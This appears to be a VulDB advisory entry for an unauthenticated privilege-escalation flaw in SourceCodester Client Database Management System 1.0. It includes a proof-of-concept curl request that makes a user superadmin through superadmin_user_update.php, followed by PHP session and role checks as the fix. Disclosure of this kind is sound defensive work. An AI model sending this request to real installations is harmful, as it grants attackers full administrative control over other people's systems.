| Title | SourceCodester Client Database Management System (CDMS) 1.0 Improper Handling of Insufficient Privileges |
|---|---|

**Description**

An unauthenticated attacker can send the following request:

```bash
curl -X POST http://127.0.0.1/cdm/superadmin_user_update.php \
  -d "user_id=32" \
  -d "firstname=Test" \
  -d "lastname=User" \
  -d "username=testuser" \
  -d "role=superadmin" \
  -d "department_assignment=IT" \
  -d "id_number=ID999"
```

Server response:

```json
{"status":"success","message":"User updated successfully!"}
```

Verification in the database:

```sql
SELECT user_id, username, role FROM users WHERE user_id=32;
```

Result:

```
user_id | username | role
32      | testuser | superadmin
```

This confirms that privilege escalation is possible without authentication.

**Impact**

An attacker can:

- Escalate privileges to superadmin
- Modify or delete users
- Delete managers
- Manipulate system data
- Gain full administrative control

This results in complete compromise of confidentiality, integrity, and availability.

**CVSS v3.1 Vector**

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Severity: Critical

**Recommended Fix**

Implement proper session validation and role-based access control:

- Require an authenticated session
- Verify that the user's role is superadmin
- Reject unauthorized requests

Example:

```php
<?php
// Load the session for the superadmin area before any other processing.
include 'superadmin_session.php';

// Deny when there is no session role at all or the role is not superadmin.
if (!isset($_SESSION['role']) || $_SESSION['role'] !== 'superadmin') {
    http_response_code(403);
    exit('Unauthorized');
}
```
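A fuller version of that guard, added here as an example that is not part of the submission or of the CDMS code base: it starts the session, denies anonymous or non-superadmin callers with the same JSON shape the endpoint already returns, logs the denial for detection, and allow-lists the `role` field. The function name, the session keys `user_id`/`role` and the role list are assumptions.

```php
<?php
// Added example (not CDMS code). Names and session keys are assumed.

function require_superadmin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }

    $authenticated = isset($_SESSION['user_id'], $_SESSION['role']);
    $isSuperadmin  = $authenticated && $_SESSION['role'] === 'superadmin';

    if (!$isSuperadmin) {
        // Record denied requests so repeated unauthenticated hits on
        // superadmin_*.php endpoints show up in the error log.
        error_log(sprintf(
            'AUTHZ DENY %s %s from %s (user_id=%s)',
            $_SERVER['REQUEST_METHOD'] ?? '-',
            $_SERVER['SCRIPT_NAME'] ?? '-',
            $_SERVER['REMOTE_ADDR'] ?? '-',
            $_SESSION['user_id'] ?? 'anonymous'
        ));
        // Reply in the JSON shape the endpoint already uses.
        http_response_code(403);
        header('Content-Type: application/json');
        exit(json_encode(['status' => 'error', 'message' => 'Unauthorized']));
    }
}

// superadmin_user_update.php would then begin with:
require_superadmin();

if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
    http_response_code(405);
    exit;
}

// Server-side allow-list for the role field (role names assumed), so even
// a valid superadmin session cannot write an arbitrary role string.
$allowedRoles = ['user', 'manager', 'superadmin'];
$role = $_POST['role'] ?? '';
if (!in_array($role, $allowedRoles, true)) {
    http_response_code(400);
    header('Content-Type: application/json');
    exit(json_encode(['status' => 'error', 'message' => 'Invalid role']));
}
```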
| Source | ⚠️ https://gist.github.com/Adarshh-A/77dedc295e377e0492d15071e9bb2498 |
|---|---|
| User | Adarsh007 (UID 95657) |
| Submission | 02/26/2026 12:04 (2 months ago) |
| Moderation | 03/07/2026 21:45 (9 days later) |
| Status | Accepted |
| VulDB entry | 349742 [SourceCodester Client Database Management System 1.0 superadmin_user_update.php improper authorization] |
| Points | 20 |